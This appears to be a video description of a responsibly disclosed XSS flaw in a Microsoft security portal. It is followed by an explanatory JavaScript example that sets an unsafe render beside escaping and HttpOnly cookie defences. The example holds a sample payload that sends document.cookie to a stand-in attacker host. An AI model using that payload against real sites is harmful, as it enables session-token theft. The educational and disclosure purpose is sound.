🔒 Unveiling My Journey: From Finding XSS Vulnerability to Submitting it to Microsoft 🔒

🔒 Unveiling My Journey: From Finding XSS Vulnerability to Earning Bounties at Microsoft 🔒

In December 2022, I stumbled upon an XSS (Cross-Site Scripting) vulnerability on security.microsoft.com, and today, I’m thrilled to share my incredible journey with you! After many months of anticipation, I can finally disclose the details of how I discovered and successfully exploited this security flaw, ultimately submitting not one but TWO vulnerabilities to Microsoft’s Bug Bounty program.

Join me as we dive deep into the world of cybersecurity, from identifying potential weak spots to crafting and executing two attack paths that led to success. These scenarios involved stealing users’ session tokens and delivering malware via the attack simulator hosted on Microsoft’s websites. I’ll take you through every step of the process, offering insights and tips for budding ethical hackers.

But that’s not all! We’ll also explore the inner workings of Microsoft’s Bug Bounty program, discussing the submission process and the calculations involved in earning rewards for responsible disclosure.

Whether you’re a cybersecurity enthusiast or simply curious about the world of ethical hacking, this video has something for everyone. Don’t forget to like, subscribe, and hit the notification bell to stay updated on all things cybersecurity. Let’s embark on this exciting journey together! 💻🌐🛡️

#Cybersecurity #EthicalHacking #BugBounty #XSSVulnerability #MicrosoftSecurity


0:00 Intro
0:23 Discovery of a vulnerability
0:42 Location of the vulnerability
0:50 We found XSS
1:04 Educate yourself
1:31 W3Schools FTW
1:51 Bug bounties are a competition
2:07 XSS explained
2:51 The details of the vulnerability in the portal
3:24 XSS: steal session token
3:59 Abuse the attack simulator to deliver malware
5:00 Submitting the report
6:00 Researcher leaderboard
6:14 Score calculation
6:39 Outro
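The session-token theft named in the description and in the "XSS: steal session token" chapter works because an injected script can read whatever cookies the browser exposes to page code. The JavaScript below is an added example, not code from the video and not Microsoft's code: it puts a reflected-XSS sink next to its HTML-escaped form, and shows the HttpOnly flag that keeps a session cookie out of document.cookie even when an injection lands. The payload, the attacker host `attacker.example` and the cookie name are constructed for the demonstration; the "browser" behaviour is modelled with plain functions so it runs under Node without a DOM.

```javascript
// Added example (not from the video): a reflected-XSS sink next to its
// hardened form, plus the cookie flags that keep a session token out of
// reach of an injected script. Runs under Node; browser behaviour is
// modelled with plain functions, no DOM is required.

// Constructed attacker payload: an <img> whose onerror handler ships
// document.cookie to a server the attacker controls (hypothetical host).
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">';

// Vulnerable pattern: a query parameter is concatenated straight into the
// page (the same mistake as assigning it to element.innerHTML).
function renderUnsafe(query) {
  return `<p>No results for: ${query}</p>`;
}

// Hardened pattern: encode the five HTML-significant characters before the
// value reaches an HTML context, so the payload is displayed as text.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}
function renderSafe(query) {
  return `<p>No results for: ${escapeHtml(query)}</p>`;
}

// Crude stand-in for the browser's parser: does the markup contain a
// <script> tag or an event-handler attribute inside a real tag?
function wouldExecuteScript(html) {
  return /<script\b|<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Defence in depth: a session cookie set with HttpOnly is not visible to
// document.cookie, so this particular payload exfiltrates nothing.
function sessionCookieHeader(token, { httpOnly = true, secure = true, sameSite = 'Lax' } = {}) {
  const parts = [`session=${token}`, 'Path=/'];
  if (secure) parts.push('Secure');
  if (httpOnly) parts.push('HttpOnly');
  if (sameSite) parts.push(`SameSite=${sameSite}`);
  return parts.join('; ');
}

// Models the browser rule: cookies carrying HttpOnly are omitted from
// document.cookie; everything else is exposed to page scripts.
function exposedToDocumentCookie(setCookieValue) {
  return !/;\s*HttpOnly\b/i.test(setCookieValue);
}

// Usage: compare the two renderings of the same input and the two cookies.
console.log(renderUnsafe(PAYLOAD));
console.log(renderSafe(PAYLOAD));
console.log(sessionCookieHeader('abc123'));
console.log(sessionCookieHeader('abc123', { httpOnly: false }));
```

Output encoding at the sink is the fix; HttpOnly only limits what a successful injection can reach, and an injected script can still act on the user's behalf from inside the page, so the flag is a mitigation, not a substitute for escaping.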
